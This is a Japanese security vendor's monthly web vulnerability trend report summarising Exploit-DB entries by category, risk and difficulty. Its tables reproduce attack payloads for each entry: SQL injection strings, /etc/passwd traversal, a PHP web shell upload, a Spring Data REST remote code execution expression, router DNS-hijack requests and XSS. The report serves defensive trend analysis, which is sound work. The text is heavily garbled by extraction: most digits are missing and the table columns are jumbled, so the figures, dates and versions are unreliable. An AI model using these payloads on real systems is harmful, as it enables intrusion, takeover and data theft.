08.0
最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年 月に公開された Exploit DB の脆弱性報告件数は 6 件でした こので最も多くの脆弱性が公開された攻撃は SQL (SQL インジェクション ) です 特に Joomla Component で つの脆弱性が公開されました こので 注目すべきことは "" <.0.0 - Release 90"" 脆弱性です 当脆弱性は それぞれ Command, File Upload, SQL 脆弱性を利用して攻撃が行なわれました このように様々な脆弱性を利用した攻撃に対しては注意する必要があります 当脆弱性を予防するためには 最新パッチとセキュアコーディングをおすすめします しかし 完璧なセキュアコーディングは不可能であり 持続的にセキュリティを維持するためにはウェブアプリケーションファイアウォールを活用した深層防御 (Defense indepth) 実装を考慮しなければなりません. 脆弱性別件数脆弱性カテゴリ 件数 6 8 취약점脆弱性別件数별보고개수 サービス拒否攻撃 (Denial of Service) クッキーセッション (Cookie Session) ローカルファイルインクルード (Local File Inclusion) 6 ファイルアップロード (File Upload) コマンドインジェクション (Command ) リモートDNS 変更 (Remote DNS Change) ディレクトリトラバーサル (Directory Traversal) クロスサイトスクリプティング (Cross Site Scripting:XSS) SQL インジェクション (SQL ) 合計 6 0 0 Denial of Service Cookie Session Weakness LFI File Upload Command Remote DNS Change Directory Traversal XSS Remote DNS Change. 危険度別件数 危険度別件数 危険度 件数 割合 早急対応要 0 8.6% 高 9.6% 6.9% 合計 6 00.00% 0 早急対応要 高. 攻撃実行の難易度別件数 難易度 件数 割合 難.69%.% 易 80.% 合計 6 00.00% 9 攻撃実行の難易度別件数. 主なソフトウェア別脆弱性発生件数 難 ソフトウェア名 件数 Server 易 uwsgi MyBB Plugin Last User's Threads in Profile Plugin Bacula-Web W00R/A0/w09r TextPattern XenForo Wordpress Plugin Site Editor Redaxo CMS Addon MyEvents Plugin Relevanssi Advantech WebAccess W08R v 主なソフトウェア別脆弱性発生件数 SecurEnvoy SecurMail W6R Tuleap FH0/A00 Firmware Plugin Duplicator Spring Data REST 合計 6 Server uwsgi MyBB Plugin Last User's Threads in Profile Plugin Bacula-Web W00R/A0/w09r TextPattern XenForo Wordpress Plugin Site Editor Redaxo CMS Addon MyEvents Plugin Relevanssi Advantech WebAccess W08R v SecurEnvoy SecurMail W6R Tuleap FH0/A00 Firmware Plugin Duplicator
最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付き EDB 番号脆弱性カテゴリ攻撃難危険度脆弱性名攻撃コード対象プログラム対象環境 POST / HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. 08-0-0 0 SQL 易高 KHTML, like Gecko Chrome/6.0.9. Safari/. < 0.9.a - Authentication Bypass Content-Length: < 0.9.a username= > &password=%0a 08-0-0 Directory Traversal 易 uwsgi <.0. - Directory Traversal /..%f..%f..%f..%f..%f..%f..%fetc/passwd uwsgi uwsgi <.0. POST / HTTP/. 0.0.00.:00 User-Agent: curl/.9.0 Content-Length: Expect: 00-continue 08-0-0 0 Command 易早急対応要 <.0.0 - Release 90 Content-Type: multipart/form-data; boundary=------------------------ - Command / File 096f69cccd --------------------------096f69cccd Content-Disposition: form-data; name="file"; filename="pfile.php" Content-Type: application/octet-stream <.0.0 - Release 90 <?php echo passthru($_get['cmd']);?> --------------------------096f69cccd-- POST / HTTP/. 0.0.00.:00 User-Agent: curl/.9.0 Content-Length: 08-0-0 0 File Upload 早急対応要 Expect: 00-continue <.0.0 - Release 90 Content-Type: multipart/form-data; boundary=------------------------ - Command / File 096f69cccd <.0.0 - Release 90 --------------------------096f69cccd Content-Disposition: form-data; name="name" anyname.php --------------------------096f69cccd POST /actions/vote_channel.php HTTP/. 0.0.00.:00 User-Agent: curl/.9.0 Content-Length: 08-0-0 0 SQL 易早急対応要 Expect: 00-continue <.0.0 - Release 90 Content-Type: multipart/form-data; boundary=------------------------ - Command / File 096f69cccd <.0.0 - Release 90 channelid=channelid=-benchmark(00000000, rand()) mode=emailexists&email=' or ''=' mode=userexists&username=' or ''=' 08-0-0 6 SQL 易早急対応要 Redaxo CMS Addon MyEvents.. - SQL /redaxo/index.php?page=myevents/event_add&myevents_id=' or ''=' Redaxo CMS Redaxo CMS Addon MyEvents Addon MyEvents.. POST /login HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. 08-0-0 6 SQL 易高 0.9.0c - Authentication Bypass KHTML, like Gecko Chrome/6.0.9. Safari/. Content-Length: 0.9.0c username= > &password=%0a /jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&ord erby=jobid&jobs_per_page=&pool_id=%%0union%0all%0se 08-0-09 SQL 難早急対応要 Bacula-Web < 8.0.0-rc - SQL LECT%0@@version%CNULL%CNULL%CNULL%CNULL%CNULL% CNULL%CNULL%CNULL%CNULL%CNULL%CNULL%CNULL%CNU LL% HTTP/. Bacula-Web Bacula-Web < 8.0.0-rc 08-0- SQL 易早急対応要 TextPattern.6. - 'qty' SQL /textpattern/textpattern/index.php?event=link&step=link_change_pageby &qty=0&_txp_token=baa0ba8d68ef80bb9dd9d8 TextPattern TextPattern.6. 08-0- 8 Directory Traversal 易 08-0- 8 XSS 易高 Advantech WebAccess < 8. - Directory Traversal / Remote Code Execution SecurEnvoy SecurMail 9..0 - Multiple Vulnerabilities..\\..\\windows\\system\\calc.exe POST /secupload/upload.aspx HTTP/. Content-Disposition: form-data; name="messageid" User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/6.0.9. Safari/. Content-Type: multipart/form-data; boundary=--------8988 Content-Length: 09 Advantech WebAccess SecurEnvoy SecurMail Advantech WebAccess < 8. SecurEnvoy SecurMail 9..0 name=""><script>alert�'xss'&#;<&#;script>"
最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付き EDB 番号 脆弱性カテゴリ 攻撃難 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 POST /plugins/tracker/?tracker=6 HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 6.0; Windows NT.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Length: 8 08-0- 86 SQL 難早急対応要 08-0- 88 XSS 易高 Tuleap 9..99.89 - Blind SQL Plugin Duplicator.. - Cross-Site Scripting Tuleap report=&criteria%b0%d=&criteria%b89%d=&criteria%b9 Tuleap 9..99.89 %D%Bvalues%D= &criteria%b9%d%bvalues%d%b%d=&criteria%b99%d%bv alues%d= &criteria%b99%d%bvalues%d%b%d=(select(0)from(select(sleep( )))a)/**/ &additional_criteria%bcomment%d=&tracker_query_submit= POST /wp-content/plugins/duplicator/installer/build/view.step.php HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/6.0.9. Safari/. Plugin Duplicator Plugin Duplicator.. Content-Length: 9 json='a';};document.write(alert(document.cookie));myviewmodel%dfunct ion(){this.status%d'' 08-0- 89 Command 早急対応要 POST / HTTP/. Host : User-Agent: Mozilla/.0 Content-Type : application/json-patch+json Spring Data REST Spring Data REST <.6.9 (Ingalls <.6.9 (Ingalls SR9) /.0. (Kay SR) - PATCH Spring Data REST T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRunti SR9) /.0. (Kay Request Remote Code Execution me().exec((t(java.lang.system).getproperty(\\\"os.name\\\").tolowercase SR) ().contains(\\\"win\\\")?\\\"cmd \\\"+" + SLASH + "+\\\"c \\\"":\\\"\\\")+%s).getinputstream(),t(org.springframework.web.context. request.requestcontextholder).currentrequestattributes().getresponse(). getoutputstream()).x 08-0- 6 Denial of Service 易高 08-0- 9 XSS 易高 POST / HTTP/. XenForo - CSS Loader Denial of Host : Service User-Agent : random.choice(headers_useragents) Content-Type : application/json\ MyBB Plugin Last User's Threads in Profile Plugin. - Persistent <p """><SCRIPT>alert("XSS")</SCRIPT>"> Cross-Site Scripting XenForo XenForo MyBB Plugin Last MyBB Plugin Last User's Threads in User's Threads in Profile Plugin Profile Plugin. 08-0- 0 LFI 易高 POST /wp-content/plugins/siteeditor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.ph p? HTTP/. User-Agent: Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. Wordpress Plugin Site Editor.. KHTML, like Gecko Chrome/6.0.9. Safari/. - Local File Inclusion Content-Length: Wordpress Wordpress Plugin Site Editor Plugin Site Editor.. ajax_path=/etc/passwd 08-0- 6 File Upload 易早急対応要 - beats_uploader Unauthenticated Arbitrary File Upload (Metasploit) POST / HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) Content-Type: multipart/form-data; boundary=#{post_data.bound} Content-Length: 8 -----------------------------dd009908f Content-Disposition: form-data; name="file"; filename="filename.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------dd009908f-- 08-0-8 0 Directory Traversal 易 POST /rpc/set_all HTTP/. User-Agent: Mozilla/.0 (Macintosh; Intel Mac OS X 0.; rv:.0) Gecko/0000 Firefox/.0 Server.0.-8. - Directory Traversal Content-Type: application/x-www-form-urlencoded Content-Length: Server Server.0.-8. 08-0-8 XSS 易高 contentdir=/../ POST /rpc/set_all HTTP/. User-Agent: Mozilla/.0 (Macintosh; Intel Mac OS X 0.; rv:.0) Gecko/0000 Firefox/.0 Server.0.-8. - Persistent Cross-Site Scripting Content-Type: application/x-www-form-urlencoded Content-Length: 9 Server Server.0.-8. friendlyname=<script>alert()</script>
最新 Web 脆弱性トレンドレポート (08.0) 08.0.0~08.0. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付き EDB 番号脆弱性カテゴリ攻撃難危険度脆弱性名攻撃コード対象プログラム対象環境 08-0-0 66 XSS 易高 /wp-admin/optionsgeneral.php?page=relevanssi%frelevanssi.php&tab='><script>var+x+ Plugin Relevanssi.0. Plugin Relevanssi - Reflected Cross-Site Scripting %D+String(%FXSS%F)%Bx+%D+x.substring(%C+x.length- Plugin Relevanssi.0. )%Balert(x)<%FSCRIPT><BR+ 08-0-0 Cookie Session Weakness Remote DNS Change 易 W08R v /goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=.0.8 - Cookie Session on&ds=8.8.8.8&ds=0.0.00." >/dev/null Weakness Remote DNS Change W08R v W08R v.0.8 08-0-0 Directory Traversal 早急対応要... - Remote Code Execution POST /oscommerce-.../catalog/install/install.php HTTP/. Host : User-Agent : Mozilla/.0 Windows NT 6.; WOW6 AppleWebKit/. KHTML, like Gecko Chrome/6.0.9. Safari/. Content-Type : application/x-www-form-urlencoded; charset=utf-8... \'); system("ls"); /* 08-0-0 Remote DNS Change 易 W6R.0.0 - Remote DNS Change goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds=8.8.8.8&ds=0.0.0.00" >/dev/null W6R W6R.0.0 08-0-0 80 Remote DNS Change 易 08-0-0 8 Remote DNS Change 易 W00R/A0/w09r v.0.6_en - Remote DNS Change (PoC) FH0/A00 Firmware v.0.68_en - Remote DNS Change goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds=8.8.8.8&ds=0.0.0.00" >/dev/null goform/advsetdns?go=wan_dns.asp&reboottag=&dsen=&dnsen=o n&ds=8.8.8.8&ds=0.0.0.00" >/dev/null W00R/A0/w W00R/A0/w 09r Wireless 09r Wireless Router Router v.0.6_en FH0/A00 FH0/A00 Firmware Firmware v.0.68_en